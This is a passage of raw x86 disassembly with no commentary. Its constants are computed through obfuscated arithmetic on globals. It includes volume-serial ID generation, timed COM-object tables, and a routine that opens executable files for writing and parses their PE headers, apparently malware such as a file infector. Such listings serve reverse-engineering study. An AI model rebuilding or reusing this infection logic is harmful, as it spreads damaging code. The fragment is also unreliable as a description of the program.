cmp ebx, eax
jz short loc_43B7DC
xor eax, eax
jmp loc_43BE20
; ---------------------------------------------------------------------------
loc_43B7DC: ; CODE XREF: sub_43B780+53�j
lea eax, [ebp+var_24]
push eax
push offset dword_44C91C
mov eax, [ebp+var_2C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word_44B090
dec eax
cmp ebx, eax
jnz loc_43BE15
lea eax, [ebp+var_28]
push eax
mov eax, [ebp+var_24]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
movsx eax, word_44B100
movsx edx, word_44B0DC
add eax, edx
sub eax, 0Fh
cmp ebx, eax
jnz loc_43BE0C
and [ebp+var_44], 0
movsx eax, word_44B100
sub eax, 9
mov [ebp+var_1C], eax
jmp loc_43BE00
; ---------------------------------------------------------------------------
loc_43B844: ; CODE XREF: sub_43B780+686�j
mov [ebp+var_18], 2
mov eax, [ebp+var_1C]
mov [ebp+var_10], eax
lea eax, [ebp+var_4]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_24]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
movsx eax, word_44B0DC
add eax, dword_44B0A0
sub eax, 0Ah
cmp ebx, eax
jnz loc_43BDFD
and [ebp+var_10048], 0
lea eax, [ebp+var_10048]
push eax
push offset dword_44C90C
mov eax, [ebp+var_4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word_44B170
sub eax, 8
cmp ebx, eax
jnz loc_43BDD9
cmp [ebp+var_10048], 0
jz loc_43BDD9
lea eax, [ebp+var_20]
push eax
mov eax, [ebp+var_10048]
push eax
mov edi, [eax]
call dword ptr [edi+0F8h]
mov ebx, eax
or ebx, ebx
jnz loc_43BDD9
lea eax, [ebp+var_10043]
push eax
push [ebp+var_20]
call sub_43A9C0
mov eax, dword_44B0F0
sub eax, 3
push eax
push offset dword_448230
lea eax, [ebp+var_10043]
push eax
call sub_43D744
add esp, 14h
movsx edi, word_44B0D0
mov esi, dword_44B094
lea edi, [edi+esi+0FFF9h]
cmp eax, edi
jz loc_43BDD9
cmp [ebp+arg_4], 0
jz short loc_43B95E
mov eax, [ebp+var_10048]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
xor eax, eax
inc eax
jmp loc_43BE20
; ---------------------------------------------------------------------------
loc_43B95E: ; CODE XREF: sub_43B780+1BF�j
and [ebp+var_1007C], 0
lea eax, [ebp+var_1007C]
push eax
push offset dword_44C93C
mov eax, [ebp+var_4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word_44B194
cmp ebx, eax
jnz loc_43BDD9
mov [ebp+var_10059], 44h
push offset dword_44C608
call sub_4424C1
mov edi, dword_44B174
movsx esi, word_44B100
add edi, esi
sub edi, 11h
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_43D744
add esp, 10h
mov esi, dword_44B0F8
add esi, 0FFF4h
movsx edx, word_44B0F4
add esi, edx
cmp eax, esi
jz short loc_43B9E3
mov [ebp+var_10059], 43h
loc_43B9E3: ; CODE XREF: sub_43B780+25A�j
push offset dword_44C600
call sub_4424C1
mov edi, dword_44B158
add edi, dword_44B0A4
dec edi
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_43D744
add esp, 10h
mov esi, dword_44B18C
add esi, dword_44B1CC
dec esi
mov edi, eax
add edi, esi
mov [ebp+var_10068], edi
mov [ebp+var_10054], edi
loc_43BA28: ; CODE XREF: sub_43B780+2BE�j
mov eax, [ebp+var_10054]
cmp [ebp+eax+var_10043], 26h
jz short loc_43BA40
inc [ebp+var_10054]
jmp short loc_43BA28
; ---------------------------------------------------------------------------
loc_43BA40: ; CODE XREF: sub_43B780+2B6�j
mov eax, [ebp+var_10054]
mov edx, dword_44B09C
add edx, dword_44B0A8
sub edx, 0Bh
mov [ebp+eax+var_10043], dl
mov eax, [ebp+var_10068]
lea eax, [ebp+eax+var_10043]
push eax
call ds:dword_445054
mov [ebp+var_10080], eax
push offset byte_44C5F9
call sub_4424C1
mov edi, dword_44B184
mov esi, edi
add esi, edi
mov edi, esi
sub edi, 0Bh
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_43D744
add esp, 14h
mov esi, dword_44B14C
add esi, dword_44B118
sub esi, 4
mov edi, eax
add edi, esi
mov [ebp+var_10068], edi
mov [ebp+var_10054], edi
loc_43BABF: ; CODE XREF: sub_43B780+355�j
mov eax, [ebp+var_10054]
cmp [ebp+eax+var_10043], 26h
jz short loc_43BAD7
inc [ebp+var_10054]
jmp short loc_43BABF
; ---------------------------------------------------------------------------
loc_43BAD7: ; CODE XREF: sub_43B780+34D�j
mov eax, [ebp+var_10054]
mov edx, dword_44B158
add edx, dword_44B174
sub edx, 9
mov [ebp+eax+var_10043], dl
mov eax, [ebp+var_10068]
lea eax, [ebp+eax+var_10043]
push eax
call ds:dword_445054
pop ecx
mov [ebp+var_10060], eax
mov eax, dword_44B12C
sub eax, 5
cmp [ebp+var_10080], eax
ja short loc_43BB83
movsx eax, word_44B16C
sub eax, 4
mov [ebp+var_1004C], eax
jmp short loc_43BB71
; ---------------------------------------------------------------------------
loc_43BB30: ; CODE XREF: sub_43B780+401�j
mov edi, [ebp+var_1004C]
mov esi, edi
shl esi, 2
cmp ds:dword_446130[esi], 0
jz short loc_43BB6B
mov edx, [ebp+var_10060]
cmp ds:dword_445060[esi], edx
jnz short loc_43BB6B
mov dl, ds:byte_447200[edi]
cmp dl, [ebp+var_10059]
jnz short loc_43BB6B
and ds:dword_446130[edi*4], 0
loc_43BB6B: ; CODE XREF: sub_43B780+3C3�j
; sub_43B780+3D2�j ...
inc [ebp+var_1004C]
loc_43BB71: ; CODE XREF: sub_43B780+3AE�j
mov eax, dword_44B1B0
add eax, 3E8h
cmp [ebp+var_1004C], eax
jb short loc_43BB30
loc_43BB83: ; CODE XREF: sub_43B780+39C�j
call ds:dword_44A770 ; GetTickCount
mov [ebp+var_10064], eax
movsx eax, word_44B0B0
sub eax, 8
mov [ebp+var_10050], eax
jmp short loc_43BBFD
; ---------------------------------------------------------------------------
loc_43BBA1: ; CODE XREF: sub_43B780+48F�j
mov edi, [ebp+var_10050]
shl edi, 2
cmp ds:dword_446130[edi], 0
jz short loc_43BBF7
mov edi, ds:dword_449660[edi]
mov esi, dword_44B0D4
add esi, 0EA5Ch
add esi, dword_44B104
mov edx, dword_44B098
add edx, dword_44B0F8
sub edx, 4
imul esi, edx
add edi, esi
cmp edi, [ebp+var_10064]
jnb short loc_43BBF7
mov edi, [ebp+var_10050]
and ds:dword_446130[edi*4], 0
loc_43BBF7: ; CODE XREF: sub_43B780+432�j
; sub_43B780+467�j
inc [ebp+var_10050]
loc_43BBFD: ; CODE XREF: sub_43B780+41F�j
movsx eax, word_44B0C8
add eax, 3E1h
cmp [ebp+var_10050], eax
jb short loc_43BBA1
movsx eax, word_44B0DC
mov edx, eax
add edx, eax
mov eax, edx
sub eax, 0Ch
mov [ebp+var_10058], eax
jmp short loc_43BC3F
; ---------------------------------------------------------------------------
loc_43BC29: ; CODE XREF: sub_43B780+4D1�j
mov edi, [ebp+var_10058]
cmp ds:dword_446130[edi*4], 0
jz short loc_43BC53
inc [ebp+var_10058]
loc_43BC3F: ; CODE XREF: sub_43B780+4A7�j
mov eax, dword_44B0C0
lea eax, [eax+eax+3E6h]
cmp [ebp+var_10058], eax
jb short loc_43BC29
loc_43BC53: ; CODE XREF: sub_43B780+4B7�j
mov edi, [ebp+var_10058]
mov esi, [ebp+var_10060]
mov ds:dword_445060[edi*4], esi
mov eax, edi
mov dl, [ebp+var_10059]
mov ds:byte_447200[eax], dl
mov eax, dword_44B1AC
sub eax, 4
cmp [ebp+var_10080], eax
jbe loc_43BD29
movsx esi, word_44B148
mov edx, dword_44B09C
lea esi, [esi+edx+0FFF4h]
mov ds:word_447A50[edi*2], si
movsx eax, word_44B19C
sub eax, 6
mov [ebp+var_10088], eax
jmp short loc_43BD15
; ---------------------------------------------------------------------------
loc_43BCB7: ; CODE XREF: sub_43B780+5A5�j
mov edi, [ebp+var_10088]
mov esi, edi
shl esi, 2
cmp ds:dword_446130[esi], 0
jz short loc_43BD0F
movzx edx, ds:word_447A50[edi*2]
movsx ecx, word_44B090
add ecx, 0FFFEh
cmp edx, ecx
jz short loc_43BD0F
mov edx, [ebp+var_10060]
cmp ds:dword_445060[esi], edx
jnz short loc_43BD0F
mov dl, ds:byte_447200[edi]
cmp dl, [ebp+var_10059]
jnz short loc_43BD0F
lea edi, ds:447A50h[edi*2]
inc word ptr [edi]
jmp short loc_43BD40
; ---------------------------------------------------------------------------
loc_43BD0F: ; CODE XREF: sub_43B780+54A�j
; sub_43B780+563�j ...
inc [ebp+var_10088]
loc_43BD15: ; CODE XREF: sub_43B780+535�j
mov eax, dword_44B0FC
add eax, 3E1h
cmp [ebp+var_10088], eax
jb short loc_43BCB7
jmp short loc_43BD40
; ---------------------------------------------------------------------------
loc_43BD29: ; CODE XREF: sub_43B780+503�j
mov edi, [ebp+var_10058]
mov esi, dword_44B0FC
sub esi, 6
mov ds:word_447A50[edi*2], si
loc_43BD40: ; CODE XREF: sub_43B780+58D�j
; sub_43B780+5A7�j
call ds:dword_44A770 ; GetTickCount
mov edi, [ebp+var_10058]
mov ds:dword_449660[edi*4], eax
lea esi, off_44B294
mov ds:dword_446130[edi*4], esi
mov edi, [ebp+var_10058]
lea edi, ds:446130h[edi*4]
mov [ebp+var_10084], edi
mov eax, edi
push eax
mov esi, [eax]
call dword ptr [esi+4]
mov [ebp+var_10078], 9
mov edi, [ebp+var_10058]
lea edi, ds:446130h[edi*4]
mov [ebp+var_10070], edi
lea esi, [ebp+var_10078]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_1007C]
push edi
mov edi, [edi]
call dword ptr [edi+0A4h]
mov ebx, eax
inc [ebp+var_10058]
lea eax, [ebp+var_10078]
push eax
call ds:dword_44ABB0
mov eax, [ebp+var_1007C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43BDD9: ; CODE XREF: sub_43B780+143�j
; sub_43B780+150�j ...
cmp [ebp+var_10048], 0
jz short loc_43BDEE
mov eax, [ebp+var_10048]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43BDEE: ; CODE XREF: sub_43B780+660�j
cmp [ebp+var_4], 0
jz short loc_43BDFD
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43BDFD: ; CODE XREF: sub_43B780+10F�j
; sub_43B780+672�j
inc [ebp+var_1C]
loc_43BE00: ; CODE XREF: sub_43B780+BF�j
mov eax, [ebp+var_28]
cmp [ebp+var_1C], eax
jb loc_43B844
loc_43BE0C: ; CODE XREF: sub_43B780+A8�j
mov eax, [ebp+var_24]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43BE15: ; CODE XREF: sub_43B780+7E�j
mov eax, [ebp+var_2C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
xor eax, eax
loc_43BE20: ; CODE XREF: sub_43B780+57�j
; sub_43B780+1D9�j
pop edi
pop esi
pop ebx
leave
retn
sub_43B780 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43BE25 proc near ; CODE XREF: sub_43A33B+2�p
; sub_43A33B+9�p
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push edi
lea eax, [ebp+var_104]
push eax
mov eax, dword_44B104
sub eax, 3
push eax
push 0
push [ebp+arg_0]
push 0
call ds:dword_447A44
mov edi, eax
or edi, edi
jnz short loc_43BE7D
push offset dword_44C5F4
call sub_4424C1
push eax
lea edi, [ebp+var_104]
push edi
call ds:dword_445020
push 1
push 43h
lea eax, [ebp+var_104]
push eax
call sub_4438E7
add esp, 18h
loc_43BE7D: ; CODE XREF: sub_43BE25+2B�j
pop edi
leave
retn
sub_43BE25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43BE80 proc near ; CODE XREF: sub_43B3A7+3C�p
; sub_43B3A7+BC�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_0]
movzx ebx, byte ptr [eax]
movsx eax, word_44B154
add eax, 0F8h
imul ebx, eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+1]
add ebx, eax
mov eax, dword_44B13C
add eax, 0FAh
add eax, dword_44B1CC
imul ebx, eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+2]
add ebx, eax
mov eax, dword_44B098
mov esi, eax
add esi, dword_44B1A4
sub esi, 7
jmp short loc_43BF23
; ---------------------------------------------------------------------------
loc_43BED3: ; CODE XREF: sub_43BE80+B6�j
mov edi, dword_44B1A0
add edi, dword_44B0D4
sub edi, 4
sub edi, esi
mov edx, [ebp+arg_4]
mov [ebp+var_4], edx
mov edx, ebx
and edx, 8000003Fh
jge short loc_43BEF9
dec edx
or edx, 0FFFFFFC0h
inc edx
loc_43BEF9: ; CODE XREF: sub_43BE80+72�j
mov ecx, off_44B1FC
mov dl, [ecx+edx]
mov ecx, [ebp+var_4]
mov [ecx+edi], dl
mov eax, ebx
mov edi, dword_44B104
add edi, 36h
mov ecx, edi
add ecx, dword_44B10C
cdq
idiv ecx
mov ebx, eax
add esi, 1
loc_43BF23: ; CODE XREF: sub_43BE80+51�j
mov eax, dword_44B118
movsx edx, word_44B0D8
add eax, edx
sub eax, 2
cmp esi, eax
jl short loc_43BED3
pop edi
pop esi
pop ebx
leave
retn
sub_43BE80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43BF3D proc near ; CODE XREF: sub_43D8A3+B7�p
; sub_43D8A3+109�p
var_7 = byte ptr -7
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov byte ptr [ebx], 0
mov ecx, esi
or eax, 0FFFFFFFFh
loc_43BF53: ; CODE XREF: sub_43BF3D+1B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43BF53
mov [ebp+var_4], eax
movsx eax, word_44B1BC
mov edi, eax
add edi, dword_44B144
sub edi, 0Bh
jmp short loc_43BFDB
; ---------------------------------------------------------------------------
loc_43BF71: ; CODE XREF: sub_43BF3D+A1�j
movzx eax, [ebp+arg_8]
cmp edi, eax
jb short loc_43BF84
mov al, [esi+edi]
cmp al, 2Fh
jz short loc_43BF84
cmp al, 2Eh
jnz short loc_43BF9D
loc_43BF84: ; CODE XREF: sub_43BF3D+3A�j
; sub_43BF3D+41�j
movzx eax, byte ptr [esi+edi]
push eax
push offset byte_44C5F1
lea eax, [ebp+var_7]
push eax
call ds:dword_44A634
add esp, 0Ch
jmp short loc_43BFCC
; ---------------------------------------------------------------------------
loc_43BF9D: ; CODE XREF: sub_43BF3D+45�j
push offset dword_44C5EC
call sub_4424C1
push eax
push ebx
call ds:dword_445020
push offset dword_44C5E4
call sub_4424C1
movzx edx, byte ptr [esi+edi]
push edx
push eax
lea edx, [ebp+var_7]
push edx
call ds:dword_44A634
add esp, 1Ch
loc_43BFCC: ; CODE XREF: sub_43BF3D+5E�j
lea eax, [ebp+var_7]
push eax
push ebx
call ds:dword_445020
add esp, 8
inc edi
loc_43BFDB: ; CODE XREF: sub_43BF3D+32�j
cmp edi, [ebp+var_4]
jb short loc_43BF71
pop edi
pop esi
pop ebx
leave
retn
sub_43BF3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43BFE5 proc near ; CODE XREF: sub_43ADAC+24�p
; sub_43B182+25�p ...
var_10D = byte ptr -10Dh
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push edi
mov edi, [ebp+arg_0]
push 104h
lea eax, [ebp+var_108]
push eax
call ds:dword_4475FC ; GetSystemDirectoryA
movsx eax, word_44B0D8
add eax, dword_44B178
movsx edx, word_44B170
sub edx, 8
mov [ebp+eax+var_10D], dl
push 104h
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_10C]
push eax
push 104h
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_108]
push eax
call ds:dword_44A614 ; GetVolumeInformationA
push offset dword_44C5DC
call sub_4424C1
push [ebp+var_10C]
push eax
push edi
call ds:dword_44A634
add esp, 10h
movsx eax, word_44B0B0
sub eax, 8
mov [ebp+var_4], eax
jmp short loc_43C0AF
; ---------------------------------------------------------------------------
loc_43C080: ; CODE XREF: sub_43BFE5+D8�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, 30h
jl short loc_43C096
cmp al, 39h
jg short loc_43C096
mov eax, [ebp+var_4]
add eax, edi
add byte ptr [eax], 31h
loc_43C096: ; CODE XREF: sub_43BFE5+A3�j
; sub_43BFE5+A7�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, 41h
jl short loc_43C0AC
cmp al, 5Ah
jg short loc_43C0AC
mov eax, [ebp+var_4]
add eax, edi
add byte ptr [eax], 20h
loc_43C0AC: ; CODE XREF: sub_43BFE5+B9�j
; sub_43BFE5+BD�j
inc [ebp+var_4]
loc_43C0AF: ; CODE XREF: sub_43BFE5+99�j
mov eax, dword_44B0B8
add eax, dword_44B0A0
cmp [ebp+var_4], eax
jb short loc_43C080
pop edi
leave
retn
sub_43BFE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C0C2 proc near ; DATA XREF: .data:off_44B2B4�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
push offset dword_44C96C
push esi
call ds:dword_44A644
or eax, eax
jz short loc_43C0EE
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43C136
; ---------------------------------------------------------------------------
loc_43C0EE: ; CODE XREF: sub_43C0C2+1A�j
push offset dword_44C8EC
push esi
call ds:dword_44A644
or eax, eax
jz short loc_43C10E
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43C136
; ---------------------------------------------------------------------------
loc_43C10E: ; CODE XREF: sub_43C0C2+3A�j
push offset dword_44C8BC
push esi
call ds:dword_44A644
or eax, eax
jz short loc_43C12E
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43C136
; ---------------------------------------------------------------------------
loc_43C12E: ; CODE XREF: sub_43C0C2+5A�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_43C136: ; CODE XREF: sub_43C0C2+2A�j
; sub_43C0C2+4A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_43C0C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C13D proc near ; DATA XREF: .data:0044B2DC�o
push ebp
mov ebp, esp
push offset dword_447604
call ds:dword_447A3C ; InterlockedIncrement
mov eax, ds:dword_447604
pop ebp
retn 4
sub_43C13D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C154 proc near ; CODE XREF: sub_443589+147�p
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1000h
call sub_444B40
push ebx
push esi
push edi
mov eax, dword_44B184
sub eax, 6
push eax
lea eax, [ebp+var_FFF]
push eax
call sub_441FCC
add esp, 8
mov eax, dword_44B0A4
mov edi, eax
add edi, dword_44B0E4
sub edi, 4
jmp short loc_43C1B0
; ---------------------------------------------------------------------------
loc_43C18E: ; CODE XREF: sub_43C154+62�j
cmp [ebp+edi+var_FFF], 23h
jnz short loc_43C1AF
movsx eax, word_44B090
add eax, dword_44B1A0
sub eax, 7
mov [ebp+edi+var_FFF], al
loc_43C1AF: ; CODE XREF: sub_43C154+42�j
inc edi
loc_43C1B0: ; CODE XREF: sub_43C154+38�j
cmp edi, 0FFFh
jb short loc_43C18E
lea esi, [ebp+var_FFF]
loc_43C1BE: ; CODE XREF: sub_43C154+F7�j
push offset dword_44C5D8
call sub_4424C1
push offset dword_446020
mov ebx, dword_44B0F0
add ebx, dword_44B0C0
sub ebx, 5
push ebx
mov ebx, dword_44B190
sub ebx, 3
push ebx
push eax
movsx ebx, word_44B0DC
add ebx, dword_44B1C8
sub ebx, 8
push ebx
push 0
push esi
push [ebp+arg_0]
mov ebx, dword_44B0B8
sub ebx, 2
and ebx, 0FFh
push ebx
call sub_43D8A3
add esp, 28h
mov ecx, esi
or eax, 0FFFFFFFFh
loc_43C21C: ; CODE XREF: sub_43C154+CD�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43C21C
mov edx, dword_44B158
movsx ecx, word_44B1BC
add edx, ecx
sub edx, 5
mov ebx, eax
add ebx, esi
mov esi, edx
add esi, ebx
movsx eax, byte ptr [esi]
mov edx, dword_44B1AC
sub edx, 4
cmp eax, edx
jnz loc_43C1BE
pop edi
pop esi
pop ebx
leave
retn
sub_43C154 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_43C256 proc near ; DATA XREF: sub_43B52C+12F�o
push ebp
mov ebp, esp
loc_43C259: ; CODE XREF: sub_43C256+25�j
call sub_43ED61
mov eax, dword_44B190
dec eax
mov edx, dword_44B10C
add edx, 0EA59h
imul eax, edx
push eax
call ds:dword_44A630
pop ecx
jmp short loc_43C259
sub_43C256 endp
; ---------------------------------------------------------------------------
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C281 proc near ; CODE XREF: sub_442E96+289�p
var_54 = byte ptr -54h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 54h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_43C298
add eax, 3Fh
loc_43C298: ; CODE XREF: sub_43C281+12�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi
call sub_441077
pop ecx
mov [ebp+var_14], eax
mov edi, [ebp+arg_4]
mov edx, dword_44B0C4
add edx, 3Ch
mov eax, edi
add eax, edx
jge short loc_43C2BF
add eax, 3Fh
loc_43C2BF: ; CODE XREF: sub_43C281+39�j
sar eax, 6
mov edi, dword_44B1C8
add edi, 3Eh
mov edx, eax
imul edx, edi
push edx
push [ebp+var_14]
call ds:dword_44502C ; RtlZeroMemory
push [ebp+arg_4]
push esi
push [ebp+var_14]
call ds:dword_449634
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
call sub_444236
mov esi, [ebp+var_14]
mov eax, dword_44B188
movsx edx, word_44B194
mov ebx, eax
add ebx, edx
jmp short loc_43C327
; ---------------------------------------------------------------------------
loc_43C308: ; CODE XREF: sub_43C281+C0�j
push esi
lea eax, [ebp+var_10]
push eax
call sub_44425D
mov eax, dword_44B0A8
add eax, 37h
movsx edx, word_44B180
add eax, edx
lea esi, [esi+eax]
inc ebx
loc_43C327: ; CODE XREF: sub_43C281+85�j
mov edi, [ebp+arg_4]
movsx edx, word_44B0BC
lea eax, [edi+edx+37h]
test eax, eax
jge short loc_43C33C
add eax, 3Fh
loc_43C33C: ; CODE XREF: sub_43C281+B6�j
sar eax, 6
cmp ebx, eax
jl short loc_43C308
push [ebp+var_14]
call sub_443565
lea eax, [ebp+var_54]
push eax
push [ebp+arg_8]
call sub_43AF9B
mov eax, dword_44B0E4
add eax, 0Eh
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
call ds:dword_44A648
add esp, 18h
mov edi, dword_44B140
sub edi, 8
cmp eax, edi
jz short loc_43C383
xor eax, eax
inc eax
jmp short loc_43C385
; ---------------------------------------------------------------------------
loc_43C383: ; CODE XREF: sub_43C281+FB�j
xor eax, eax
loc_43C385: ; CODE XREF: sub_43C281+100�j
pop edi
pop esi
pop ebx
leave
retn
sub_43C281 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C38A proc near ; CODE XREF: sub_442A46+1B1�p
var_3200C = dword ptr -3200Ch
var_32008 = dword ptr -32008h
var_32004 = byte ptr -32004h
var_32003 = byte ptr -32003h
var_31FFD = byte ptr -31FFDh
var_31F54 = dword ptr -31F54h
var_31F50 = dword ptr -31F50h
var_31F4C = dword ptr -31F4Ch
var_31F48 = dword ptr -31F48h
var_31F44 = dword ptr -31F44h
var_31F40 = dword ptr -31F40h
var_31F3C = dword ptr -31F3Ch
var_31F38 = dword ptr -31F38h
var_31F34 = dword ptr -31F34h
var_31F30 = dword ptr -31F30h
var_31F2C = dword ptr -31F2Ch
var_31F28 = dword ptr -31F28h
var_31F24 = dword ptr -31F24h
var_31F20 = dword ptr -31F20h
var_31F1C = dword ptr -31F1Ch
var_31F18 = dword ptr -31F18h
var_31F14 = dword ptr -31F14h
var_31F10 = dword ptr -31F10h
var_31F0C = dword ptr -31F0Ch
var_31F08 = dword ptr -31F08h
var_31F04 = dword ptr -31F04h
var_31F00 = dword ptr -31F00h
var_31EFC = dword ptr -31EFCh
var_31EF8 = dword ptr -31EF8h
var_31EF4 = dword ptr -31EF4h
var_31EF0 = dword ptr -31EF0h
var_31EEC = dword ptr -31EECh
var_31EE8 = dword ptr -31EE8h
var_31EE4 = dword ptr -31EE4h
var_31EE0 = dword ptr -31EE0h
var_31EDC = dword ptr -31EDCh
var_31ED8 = dword ptr -31ED8h
var_31ED4 = dword ptr -31ED4h
var_31ED0 = byte ptr -31ED0h
var_31EC3 = byte ptr -31EC3h
var_1190 = dword ptr -1190h
var_118C = dword ptr -118Ch
var_1188 = dword ptr -1188h
var_1184 = dword ptr -1184h
var_1180 = dword ptr -1180h
var_117C = dword ptr -117Ch
var_1178 = dword ptr -1178h
var_1174 = dword ptr -1174h
var_116F = byte ptr -116Fh
var_1070 = dword ptr -1070h
var_106C = dword ptr -106Ch
var_1068 = dword ptr -1068h
var_1064 = dword ptr -1064h
var_1060 = dword ptr -1060h
var_105C = dword ptr -105Ch
var_1058 = dword ptr -1058h
var_1054 = dword ptr -1054h
var_1050 = dword ptr -1050h
var_C54 = dword ptr -0C54h
var_C50 = dword ptr -0C50h
var_C4C = dword ptr -0C4Ch
var_850 = dword ptr -850h
var_84C = dword ptr -84Ch
var_848 = dword ptr -848h
var_844 = dword ptr -844h
var_840 = dword ptr -840h
var_83C = dword ptr -83Ch
var_440 = dword ptr -440h
var_43C = dword ptr -43Ch
var_438 = dword ptr -438h
var_434 = dword ptr -434h
var_430 = dword ptr -430h
var_42C = dword ptr -42Ch
var_428 = dword ptr -428h
var_424 = dword ptr -424h
var_420 = dword ptr -420h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 3200Ch
call sub_444B40
push ebx
push esi
push edi
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_31EC3]
push eax
call ds:dword_449634
add esp, 0Ch
push 0
push dword_44B164
push 3
push 0
mov eax, dword_44B0A0
sub eax, 4
push eax
push 0C0000001h
push [ebp+arg_0]
call ds:dword_44A788 ; CreateFileA
mov [ebp+var_1070], eax
cmp eax, 0FFFFFFFFh
jnz short loc_43C3E5
xor eax, eax
jmp loc_43D73F
; ---------------------------------------------------------------------------
loc_43C3E5: ; CODE XREF: sub_43C38A+52�j
push 0
push [ebp+var_1070]
call ds:dword_44A624 ; GetFileSize
mov [ebp+var_10], eax
mov edx, [ebp+arg_8]
lea eax, [eax+edx+1FFFFh]
push eax
push 0
call ds:dword_447A34 ; LocalAlloc
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_31ED8]
push eax
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_1070]
call ds:dword_445028 ; ReadFile
mov eax, [ebp+var_4]
mov eax, [eax+3Ch]
mov [ebp+var_840], eax
mov eax, [ebp+var_31ED8]
sub eax, 0F8h
cmp [ebp+var_840], eax
ja loc_43D728
mov eax, [ebp+var_840]
add eax, [ebp+var_4]
mov [ebp+var_8], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jnz loc_43D728
mov eax, [ebp+var_8]
movzx eax, word ptr [eax+5Ch]
mov edx, dword_44B0E4
movsx ecx, word_44B180
add edx, ecx
sub edx, 7
cmp eax, edx
jz loc_43D728
mov eax, [ebp+var_8]
movzx edx, word ptr [eax+44h]
movsx ecx, word_44B0DC
add ecx, 7
cmp edx, ecx
jnz short loc_43C4AF
mov edx, dword_44B158
add edx, 8
mov [eax+1Ah], dl
cmp dl, 0
jnz loc_43D728
